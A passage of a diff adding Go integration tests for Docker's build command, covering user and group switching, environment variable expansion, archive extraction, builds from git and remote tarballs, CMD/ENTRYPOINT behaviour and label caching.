+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)" = '0:0/root:root' ]
+
+# TODO decide if "args.user = strconv.Itoa(syscall.Getuid())" is acceptable behavior for changeUser in sysvinit instead of "return nil" when "USER" isn't specified (so that we get the proper group list even if that is the empty list, even in the default case of not supplying an explicit USER to run as, which implies USER 0)
+USER root
+RUN [ "$(id -G):$(id -Gn)" = '0 10:root wheel' ]
+
+# Setup dockerio user and group
+RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd && \
+	echo 'dockerio:x:1001:' >> /etc/group
+
+# Make sure we can switch to our user and all the information is exactly as we expect it to be
+USER dockerio
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ]
+
+# Switch back to root and double check that worked exactly as we might expect it to
+USER root
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '0:0/root:root/0 10:root wheel' ] && \
+        # Add a "supplementary" group for our dockerio user
+	echo 'supplementary:x:1002:dockerio' >> /etc/group
+
+# ... and then go verify that we get it like we expect
+USER dockerio
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001 1002:dockerio supplementary' ]
+USER 1001
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001 1002:dockerio supplementary' ]
+
+# super test the new "user:group" syntax
+USER dockerio:dockerio
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ]
+USER 1001:dockerio
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ]
+USER dockerio:1001
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ]
+USER 1001:1001
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ]
+USER dockerio:supplementary
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ]
+USER dockerio:1002
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ]
+USER 1001:supplementary
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ]
+USER 1001:1002
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ]
+
+# make sure unknown uid/gid still works properly
+USER 1042:1043
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1042:1043/1042:1043/1043:1043' ]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildEnvUsage(c *check.C) {
+	// /docker/world/hello is not owned by the correct user
+	testRequires(c, NotUserNamespace)
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildenvusage"
+	dockerfile := `FROM busybox
+ENV    HOME /root
+ENV    PATH $HOME/bin:$PATH
+ENV    PATH /tmp:$PATH
+RUN    [ "$PATH" = "/tmp:$HOME/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ]
+ENV    FOO /foo/baz
+ENV    BAR /bar
+ENV    BAZ $BAR
+ENV    FOOPATH $PATH:$FOO
+RUN    [ "$BAR" = "$BAZ" ]
+RUN    [ "$FOOPATH" = "$PATH:/foo/baz" ]
+ENV	   FROM hello/docker/world
+ENV    TO /docker/world/hello
+ADD    $FROM $TO
+RUN    [ "$(cat $TO)" = "hello" ]
+ENV    abc=def
+ENV    ghi=$abc
+RUN    [ "$ghi" = "def" ]
+`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"hello/docker/world": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	_, err = buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildEnvUsage2(c *check.C) {
+	// /docker/world/hello is not owned by the correct user
+	testRequires(c, NotUserNamespace)
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildenvusage2"
+	dockerfile := `FROM busybox
+ENV    abc=def def="hello world"
+RUN    [ "$abc,$def" = "def,hello world" ]
+ENV    def=hello\ world v1=abc v2="hi there" v3='boogie nights' v4="with'quotes too"
+RUN    [ "$def,$v1,$v2,$v3,$v4" = "hello world,abc,hi there,boogie nights,with'quotes too" ]
+ENV    abc=zzz FROM=hello/docker/world
+ENV    abc=zzz TO=/docker/world/hello
+ADD    $FROM $TO
+RUN    [ "$abc,$(cat $TO)" = "zzz,hello" ]
+ENV    abc 'yyy'
+RUN    [ $abc = 'yyy' ]
+ENV    abc=
+RUN    [ "$abc" = "" ]
+
+# use grep to make sure if the builder substitutes \$foo by mistake
+# we don't get a false positive
+ENV    abc=\$foo
+RUN    [ "$abc" = "\$foo" ] && (echo "$abc" | grep foo)
+ENV    abc \$foo
+RUN    [ "$abc" = "\$foo" ] && (echo "$abc" | grep foo)
+
+ENV    abc=\'foo\' abc2=\"foo\"
+RUN    [ "$abc,$abc2" = "'foo',\"foo\"" ]
+ENV    abc "foo"
+RUN    [ "$abc" = "foo" ]
+ENV    abc 'foo'
+RUN    [ "$abc" = 'foo' ]
+ENV    abc \'foo\'
+RUN    [ "$abc" = "'foo'" ]
+ENV    abc \"foo\"
+RUN    [ "$abc" = '"foo"' ]
+
+ENV    abc=ABC
+RUN    [ "$abc" = "ABC" ]
+ENV    def1=${abc:-DEF} def2=${ccc:-DEF}
+ENV    def3=${ccc:-${def2}xx} def4=${abc:+ALT} def5=${def2:+${abc}:} def6=${ccc:-\$abc:} def7=${ccc:-\${abc}:}
+RUN    [ "$def1,$def2,$def3,$def4,$def5,$def6,$def7" = 'ABC,DEF,DEFxx,ALT,ABC:,$abc:,${abc:}' ]
+ENV    mypath=${mypath:+$mypath:}/home
+ENV    mypath=${mypath:+$mypath:}/away
+RUN    [ "$mypath" = '/home:/away' ]
+
+ENV    e1=bar
+ENV    e2=$e1 e3=$e11 e4=\$e1 e5=\$e11
+RUN    [ "$e0,$e1,$e2,$e3,$e4,$e5" = ',bar,bar,,$e1,$e11' ]
+
+ENV    ee1 bar
+ENV    ee2 $ee1
+ENV    ee3 $ee11
+ENV    ee4 \$ee1
+ENV    ee5 \$ee11
+RUN    [ "$ee1,$ee2,$ee3,$ee4,$ee5" = 'bar,bar,,$ee1,$ee11' ]
+
+ENV    eee1="foo" eee2='foo'
+ENV    eee3 "foo"
+ENV    eee4 'foo'
+RUN    [ "$eee1,$eee2,$eee3,$eee4" = 'foo,foo,foo,foo' ]
+
+`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"hello/docker/world": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	_, err = buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildAddScript(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildaddscript"
+	dockerfile := `
+FROM busybox
+ADD test /test
+RUN ["chmod","+x","/test"]
+RUN ["/test"]
+RUN [ "$(cat /testfile)" = 'test!' ]`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"test": "#!/bin/sh\necho 'test!' > /testfile",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	_, err = buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildAddTar(c *check.C) {
+	// /test/foo is not owned by the correct user
+	testRequires(c, NotUserNamespace)
+	name := "testbuildaddtar"
+
+	ctx := func() *FakeContext {
+		dockerfile := `
+FROM busybox
+ADD test.tar /
+RUN cat /test/foo | grep Hi
+ADD test.tar /test.tar
+RUN cat /test.tar/test/foo | grep Hi
+ADD test.tar /unlikely-to-exist
+RUN cat /unlikely-to-exist/test/foo | grep Hi
+ADD test.tar /unlikely-to-exist-trailing-slash/
+RUN cat /unlikely-to-exist-trailing-slash/test/foo | grep Hi
+RUN sh -c "mkdir /existing-directory" #sh -c is needed on Windows to use the correct mkdir
+ADD test.tar /existing-directory
+RUN cat /existing-directory/test/foo | grep Hi
+ADD test.tar /existing-directory-trailing-slash/
+RUN cat /existing-directory-trailing-slash/test/foo | grep Hi`
+		tmpDir, err := ioutil.TempDir("", "fake-context")
+		c.Assert(err, check.IsNil)
+		testTar, err := os.Create(filepath.Join(tmpDir, "test.tar"))
+		if err != nil {
+			c.Fatalf("failed to create test.tar archive: %v", err)
+		}
+		defer testTar.Close()
+
+		tw := tar.NewWriter(testTar)
+
+		if err := tw.WriteHeader(&tar.Header{
+			Name: "test/foo",
+			Size: 2,
+		}); err != nil {
+			c.Fatalf("failed to write tar file header: %v", err)
+		}
+		if _, err := tw.Write([]byte("Hi")); err != nil {
+			c.Fatalf("failed to write tar file content: %v", err)
+		}
+		if err := tw.Close(); err != nil {
+			c.Fatalf("failed to close tar archive: %v", err)
+		}
+
+		if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil {
+			c.Fatalf("failed to open destination dockerfile: %v", err)
+		}
+		return fakeContextFromDir(tmpDir)
+	}()
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("build failed to complete for TestBuildAddTar: %v", err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildAddBrokenTar(c *check.C) {
+	name := "testbuildaddbrokentar"
+
+	ctx := func() *FakeContext {
+		dockerfile := `
+FROM busybox
+ADD test.tar /`
+		tmpDir, err := ioutil.TempDir("", "fake-context")
+		c.Assert(err, check.IsNil)
+		testTar, err := os.Create(filepath.Join(tmpDir, "test.tar"))
+		if err != nil {
+			c.Fatalf("failed to create test.tar archive: %v", err)
+		}
+		defer testTar.Close()
+
+		tw := tar.NewWriter(testTar)
+
+		if err := tw.WriteHeader(&tar.Header{
+			Name: "test/foo",
+			Size: 2,
+		}); err != nil {
+			c.Fatalf("failed to write tar file header: %v", err)
+		}
+		if _, err := tw.Write([]byte("Hi")); err != nil {
+			c.Fatalf("failed to write tar file content: %v", err)
+		}
+		if err := tw.Close(); err != nil {
+			c.Fatalf("failed to close tar archive: %v", err)
+		}
+
+		// Corrupt the tar by removing one byte off the end
+		stat, err := testTar.Stat()
+		if err != nil {
+			c.Fatalf("failed to stat tar archive: %v", err)
+		}
+		if err := testTar.Truncate(stat.Size() - 1); err != nil {
+			c.Fatalf("failed to truncate tar archive: %v", err)
+		}
+
+		if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil {
+			c.Fatalf("failed to open destination dockerfile: %v", err)
+		}
+		return fakeContextFromDir(tmpDir)
+	}()
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err == nil {
+		c.Fatalf("build should have failed for TestBuildAddBrokenTar")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddNonTar(c *check.C) {
+	name := "testbuildaddnontar"
+
+	// Should not try to extract test.tar
+	ctx, err := fakeContext(`
+		FROM busybox
+		ADD test.tar /
+		RUN test -f /test.tar`,
+		map[string]string{"test.tar": "not_a_tar_file"})
+
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("build failed for TestBuildAddNonTar")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddTarXz(c *check.C) {
+	// /test/foo is not owned by the correct user
+	testRequires(c, NotUserNamespace)
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildaddtarxz"
+
+	ctx := func() *FakeContext {
+		dockerfile := `
+			FROM busybox
+			ADD test.tar.xz /
+			RUN cat /test/foo | grep Hi`
+		tmpDir, err := ioutil.TempDir("", "fake-context")
+		c.Assert(err, check.IsNil)
+		testTar, err := os.Create(filepath.Join(tmpDir, "test.tar"))
+		if err != nil {
+			c.Fatalf("failed to create test.tar archive: %v", err)
+		}
+		defer testTar.Close()
+
+		tw := tar.NewWriter(testTar)
+
+		if err := tw.WriteHeader(&tar.Header{
+			Name: "test/foo",
+			Size: 2,
+		}); err != nil {
+			c.Fatalf("failed to write tar file header: %v", err)
+		}
+		if _, err := tw.Write([]byte("Hi")); err != nil {
+			c.Fatalf("failed to write tar file content: %v", err)
+		}
+		if err := tw.Close(); err != nil {
+			c.Fatalf("failed to close tar archive: %v", err)
+		}
+
+		xzCompressCmd := exec.Command("xz", "-k", "test.tar")
+		xzCompressCmd.Dir = tmpDir
+		out, _, err := runCommandWithOutput(xzCompressCmd)
+		if err != nil {
+			c.Fatal(err, out)
+		}
+
+		if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil {
+			c.Fatalf("failed to open destination dockerfile: %v", err)
+		}
+		return fakeContextFromDir(tmpDir)
+	}()
+
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildAddTarXzGz(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildaddtarxzgz"
+
+	ctx := func() *FakeContext {
+		dockerfile := `
+			FROM busybox
+			ADD test.tar.xz.gz /
+			RUN ls /test.tar.xz.gz`
+		tmpDir, err := ioutil.TempDir("", "fake-context")
+		c.Assert(err, check.IsNil)
+		testTar, err := os.Create(filepath.Join(tmpDir, "test.tar"))
+		if err != nil {
+			c.Fatalf("failed to create test.tar archive: %v", err)
+		}
+		defer testTar.Close()
+
+		tw := tar.NewWriter(testTar)
+
+		if err := tw.WriteHeader(&tar.Header{
+			Name: "test/foo",
+			Size: 2,
+		}); err != nil {
+			c.Fatalf("failed to write tar file header: %v", err)
+		}
+		if _, err := tw.Write([]byte("Hi")); err != nil {
+			c.Fatalf("failed to write tar file content: %v", err)
+		}
+		if err := tw.Close(); err != nil {
+			c.Fatalf("failed to close tar archive: %v", err)
+		}
+
+		xzCompressCmd := exec.Command("xz", "-k", "test.tar")
+		xzCompressCmd.Dir = tmpDir
+		out, _, err := runCommandWithOutput(xzCompressCmd)
+		if err != nil {
+			c.Fatal(err, out)
+		}
+
+		gzipCompressCmd := exec.Command("gzip", "test.tar.xz")
+		gzipCompressCmd.Dir = tmpDir
+		out, _, err = runCommandWithOutput(gzipCompressCmd)
+		if err != nil {
+			c.Fatal(err, out)
+		}
+
+		if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil {
+			c.Fatalf("failed to open destination dockerfile: %v", err)
+		}
+		return fakeContextFromDir(tmpDir)
+	}()
+
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(name, ctx, true); err != nil {
+		c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildFromGit(c *check.C) {
+	name := "testbuildfromgit"
+	git, err := newFakeGit("repo", map[string]string{
+		"Dockerfile": `FROM busybox
+					ADD first /first
+					RUN [ -f /first ]
+					MAINTAINER docker`,
+		"first": "test git data",
+	}, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer git.Close()
+
+	_, err = buildImageFromPath(name, git.RepoURL, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Author")
+	if res != "docker" {
+		c.Fatalf("Maintainer should be docker, got %s", res)
+	}
+}
+
+func (s *DockerSuite) TestBuildFromGitWithContext(c *check.C) {
+	name := "testbuildfromgit"
+	git, err := newFakeGit("repo", map[string]string{
+		"docker/Dockerfile": `FROM busybox
+					ADD first /first
+					RUN [ -f /first ]
+					MAINTAINER docker`,
+		"docker/first": "test git data",
+	}, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer git.Close()
+
+	u := fmt.Sprintf("%s#master:docker", git.RepoURL)
+	_, err = buildImageFromPath(name, u, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Author")
+	if res != "docker" {
+		c.Fatalf("Maintainer should be docker, got %s", res)
+	}
+}
+
+func (s *DockerSuite) TestBuildFromGitwithF(c *check.C) {
+	name := "testbuildfromgitwithf"
+	git, err := newFakeGit("repo", map[string]string{
+		"myApp/myDockerfile": `FROM busybox
+					RUN echo hi from Dockerfile`,
+	}, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer git.Close()
+
+	out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "myApp/myDockerfile", git.RepoURL)
+	if err != nil {
+		c.Fatalf("Error on build. Out: %s\nErr: %v", out, err)
+	}
+
+	if !strings.Contains(out, "hi from Dockerfile") {
+		c.Fatalf("Missing expected output, got:\n%s", out)
+	}
+}
+
+func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) {
+	name := "testbuildfromremotetarball"
+
+	buffer := new(bytes.Buffer)
+	tw := tar.NewWriter(buffer)
+	defer tw.Close()
+
+	dockerfile := []byte(`FROM busybox
+					MAINTAINER docker`)
+	if err := tw.WriteHeader(&tar.Header{
+		Name: "Dockerfile",
+		Size: int64(len(dockerfile)),
+	}); err != nil {
+		c.Fatalf("failed to write tar file header: %v", err)
+	}
+	if _, err := tw.Write(dockerfile); err != nil {
+		c.Fatalf("failed to write tar file content: %v", err)
+	}
+	if err := tw.Close(); err != nil {
+		c.Fatalf("failed to close tar archive: %v", err)
+	}
+
+	server, err := fakeBinaryStorage(map[string]*bytes.Buffer{
+		"testT.tar": buffer,
+	})
+	c.Assert(err, check.IsNil)
+
+	defer server.Close()
+
+	_, err = buildImageFromPath(name, server.URL()+"/testT.tar", true)
+	c.Assert(err, check.IsNil)
+
+	res := inspectField(c, name, "Author")
+
+	if res != "docker" {
+		c.Fatalf("Maintainer should be docker, got %s", res)
+	}
+}
+
+func (s *DockerSuite) TestBuildCleanupCmdOnEntrypoint(c *check.C) {
+	name := "testbuildcmdcleanuponentrypoint"
+	if _, err := buildImage(name,
+		`FROM `+minimalBaseImage()+`
+        CMD ["test"]
+		ENTRYPOINT ["echo"]`,
+		true); err != nil {
+		c.Fatal(err)
+	}
+	if _, err := buildImage(name,
+		fmt.Sprintf(`FROM %s
+		ENTRYPOINT ["cat"]`, name),
+		true); err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.Cmd")
+	if res != "[]" {
+		c.Fatalf("Cmd %s, expected nil", res)
+	}
+
+	res = inspectField(c, name, "Config.Entrypoint")
+	if expected := "[cat]"; res != expected {
+		c.Fatalf("Entrypoint %s, expected %s", res, expected)
+	}
+}
+
+func (s *DockerSuite) TestBuildClearCmd(c *check.C) {
+	name := "testbuildclearcmd"
+	_, err := buildImage(name,
+		`From `+minimalBaseImage()+`
+   ENTRYPOINT ["/bin/bash"]
+   CMD []`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectFieldJSON(c, name, "Config.Cmd")
+	if res != "[]" {
+		c.Fatalf("Cmd %s, expected %s", res, "[]")
+	}
+}
+
+func (s *DockerSuite) TestBuildEmptyCmd(c *check.C) {
+	// Skip on Windows. Base image on Windows has a CMD set in the image.
+	testRequires(c, DaemonIsLinux)
+
+	name := "testbuildemptycmd"
+	if _, err := buildImage(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", true); err != nil {
+		c.Fatal(err)
+	}
+	res := inspectFieldJSON(c, name, "Config.Cmd")
+	if res != "null" {
+		c.Fatalf("Cmd %s, expected %s", res, "null")
+	}
+}
+
+func (s *DockerSuite) TestBuildOnBuildOutput(c *check.C) {
+	name := "testbuildonbuildparent"
+	if _, err := buildImage(name, "FROM busybox\nONBUILD RUN echo foo\n", true); err != nil {
+		c.Fatal(err)
+	}
+
+	_, out, err := buildImageWithOut(name, "FROM "+name+"\nMAINTAINER quux\n", true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	if !strings.Contains(out, "# Executing 1 build trigger") {
+		c.Fatal("failed to find the build trigger output", out)
+	}
+}
+
+func (s *DockerSuite) TestBuildInvalidTag(c *check.C) {
+	name := "abcd:" + stringutils.GenerateRandomAlphaOnlyString(200)
+	_, out, err := buildImageWithOut(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", true)
+	// if the error doesn't check for illegal tag name, or the image is built
+	// then this should fail
+	if !strings.Contains(out, "Error parsing reference") || strings.Contains(out, "Sending build context to Docker daemon") {
+		c.Fatalf("failed to stop before building. Error: %s, Output: %s", err, out)
+	}
+}
+
+func (s *DockerSuite) TestBuildCmdShDashC(c *check.C) {
+	name := "testbuildcmdshc"
+	if _, err := buildImage(name, "FROM busybox\nCMD echo cmd\n", true); err != nil {
+		c.Fatal(err)
+	}
+
+	res := inspectFieldJSON(c, name, "Config.Cmd")
+
+	expected := `["/bin/sh","-c","echo cmd"]`
+	if daemonPlatform == "windows" {
+		expected = `["cmd","/S","/C","echo cmd"]`
+	}
+
+	if res != expected {
+		c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildCmdSpaces(c *check.C) {
+	// Test to make sure that when we strcat arrays we take into account
+	// the arg separator to make sure ["echo","hi"] and ["echo hi"] don't
+	// look the same
+	name := "testbuildcmdspaces"
+	var id1 string
+	var id2 string
+	var err error
+
+	if id1, err = buildImage(name, "FROM busybox\nCMD [\"echo hi\"]\n", true); err != nil {
+		c.Fatal(err)
+	}
+
+	if id2, err = buildImage(name, "FROM busybox\nCMD [\"echo\", \"hi\"]\n", true); err != nil {
+		c.Fatal(err)
+	}
+
+	if id1 == id2 {
+		c.Fatal("Should not have resulted in the same CMD")
+	}
+
+	// Now do the same with ENTRYPOINT
+	if id1, err = buildImage(name, "FROM busybox\nENTRYPOINT [\"echo hi\"]\n", true); err != nil {
+		c.Fatal(err)
+	}
+
+	if id2, err = buildImage(name, "FROM busybox\nENTRYPOINT [\"echo\", \"hi\"]\n", true); err != nil {
+		c.Fatal(err)
+	}
+
+	if id1 == id2 {
+		c.Fatal("Should not have resulted in the same ENTRYPOINT")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildCmdJSONNoShDashC(c *check.C) {
+	name := "testbuildcmdjson"
+	if _, err := buildImage(name, "FROM busybox\nCMD [\"echo\", \"cmd\"]", true); err != nil {
+		c.Fatal(err)
+	}
+
+	res := inspectFieldJSON(c, name, "Config.Cmd")
+
+	expected := `["echo","cmd"]`
+
+	if res != expected {
+		c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEntrypointInheritance(c *check.C) {
+
+	if _, err := buildImage("parent", `
+    FROM busybox
+    ENTRYPOINT exit 130
+    `, true); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, status, _ := dockerCmdWithError("run", "parent"); status != 130 {
+		c.Fatalf("expected exit code 130 but received %d", status)
+	}
+
+	if _, err := buildImage("child", `
+    FROM parent
+    ENTRYPOINT exit 5
+    `, true); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, status, _ := dockerCmdWithError("run", "child"); status != 5 {
+		c.Fatalf("expected exit code 5 but received %d", status)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEntrypointInheritanceInspect(c *check.C) {
+	var (
+		name     = "testbuildepinherit"
+		name2    = "testbuildepinherit2"
+		expected = `["/bin/sh","-c","echo quux"]`
+	)
+
+	if daemonPlatform == "windows" {
+		expected = `["cmd","/S","/C","echo quux"]`
+	}
+
+	if _, err := buildImage(name, "FROM busybox\nENTRYPOINT /foo/bar", true); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, err := buildImage(name2, fmt.Sprintf("FROM %s\nENTRYPOINT echo quux", name), true); err != nil {
+		c.Fatal(err)
+	}
+
+	res := inspectFieldJSON(c, name2, "Config.Entrypoint")
+
+	if res != expected {
+		c.Fatalf("Expected value %s not in Config.Entrypoint: %s", expected, res)
+	}
+
+	out, _ := dockerCmd(c, "run", name2)
+
+	expected = "quux"
+
+	if strings.TrimSpace(out) != expected {
+		c.Fatalf("Expected output is %s, got %s", expected, out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildRunShEntrypoint(c *check.C) {
+	name := "testbuildentrypoint"
+	_, err := buildImage(name,
+		`FROM busybox
+                                ENTRYPOINT echo`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "run", "--rm", name)
+}
+
+func (s *DockerSuite) TestBuildExoticShellInterpolation(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuildexoticshellinterpolation"
+
+	_, err := buildImage(name, `
+		FROM busybox
+
+		ENV SOME_VAR a.b.c
+
+		RUN [ "$SOME_VAR"       = 'a.b.c' ]
+		RUN [ "${SOME_VAR}"     = 'a.b.c' ]
+		RUN [ "${SOME_VAR%.*}"  = 'a.b'   ]
+		RUN [ "${SOME_VAR%%.*}" = 'a'     ]
+		RUN [ "${SOME_VAR#*.}"  = 'b.c'   ]
+		RUN [ "${SOME_VAR##*.}" = 'c'     ]
+		RUN [ "${SOME_VAR/c/d}" = 'a.b.d' ]
+		RUN [ "${#SOME_VAR}"    = '5'     ]
+
+		RUN [ "${SOME_UNSET_VAR:-$SOME_VAR}" = 'a.b.c' ]
+		RUN [ "${SOME_VAR:+Version: ${SOME_VAR}}" = 'Version: a.b.c' ]
+		RUN [ "${SOME_UNSET_VAR:+${SOME_VAR}}" = '' ]
+		RUN [ "${SOME_UNSET_VAR:-${SOME_VAR:-d.e.f}}" = 'a.b.c' ]
+	`, false)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildVerifySingleQuoteFails(c *check.C) {
+	// This testcase is supposed to generate an error because the
+	// JSON array we're passing in on the CMD uses single quotes instead
+	// of double quotes (per the JSON spec). This means we interpret it
+	// as a "string" instead of "JSON array" and pass it on to "sh -c" and
+	// it should barf on it.
+	name := "testbuildsinglequotefails"
+
+	if _, err := buildImage(name,
+		`FROM busybox
+		CMD [ '/bin/sh', '-c', 'echo hi' ]`,
+		true); err != nil {
+		c.Fatal(err)
+	}
+
+	if _, _, err := dockerCmdWithError("run", "--rm", name); err == nil {
+		c.Fatal("The image was not supposed to be able to run")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildVerboseOut(c *check.C) {
+	name := "testbuildverboseout"
+	expected := "\n123\n"
+
+	if daemonPlatform == "windows" {
+		expected = "\n123\r\n"
+	}
+
+	_, out, err := buildImageWithOut(name,
+		`FROM busybox
+RUN echo 123`,
+		false)
+
+	if err != nil {
+		c.Fatal(err)
+	}
+	if !strings.Contains(out, expected) {
+		c.Fatalf("Output should contain %q: %q", "123", out)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildWithTabs(c *check.C) {
+	name := "testbuildwithtabs"
+	_, err := buildImage(name,
+		"FROM busybox\nRUN echo\tone\t\ttwo", true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectFieldJSON(c, name, "ContainerConfig.Cmd")
+	expected1 := `["/bin/sh","-c","echo\tone\t\ttwo"]`
+	expected2 := `["/bin/sh","-c","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates
+	if daemonPlatform == "windows" {
+		expected1 = `["cmd","/S","/C","echo\tone\t\ttwo"]`
+		expected2 = `["cmd","/S","/C","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates
+	}
+	if res != expected1 && res != expected2 {
+		c.Fatalf("Missing tabs.\nGot: %s\nExp: %s or %s", res, expected1, expected2)
+	}
+}
+
+func (s *DockerSuite) TestBuildLabels(c *check.C) {
+	name := "testbuildlabel"
+	expected := `{"License":"GPL","Vendor":"Acme"}`
+	_, err := buildImage(name,
+		`FROM busybox
+		LABEL Vendor=Acme
+                LABEL License GPL`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectFieldJSON(c, name, "Config.Labels")
+	if res != expected {
+		c.Fatalf("Labels %s, expected %s", res, expected)
+	}
+}
+
+func (s *DockerSuite) TestBuildLabelsCache(c *check.C) {
+	name := "testbuildlabelcache"
+
+	id1, err := buildImage(name,
+		`FROM busybox
+		LABEL Vendor=Acme`, false)
+	if err != nil {
+		c.Fatalf("Build 1 should have worked: %v", err)
+	}
+
+	id2, err := buildImage(name,
+		`FROM busybox
+		LABEL Vendor=Acme`, true)
+	if err != nil || id1 != id2 {
+		c.Fatalf("Build 2 should have worked & used cache(%s,%s): %v", id1, id2, err)
+	}
+
+	id2, err = buildImage(name,
+		`FROM busybox
+		LABEL Vendor=Acme1`, true)
+	if err != nil || id1 == id2 {
+		c.Fatalf("Build 3 should have worked & NOT used cache(%s,%s): %v", id1, id2, err)
+	}
+
+	id2, err = buildImage(name,
+		`FROM busybox
+		LABEL Vendor Acme`, true) // Note: " " and "=" should be same
+	if err != nil || id1 != id2 {
+		c.Fatalf("Build 4 should have worked & used cache(%s,%s): %v", id1, id2, err)
+	}
+
+	// Now make sure the cache isn't used by mistake
+	id1, err = buildImage(name,
+		`FROM busybox
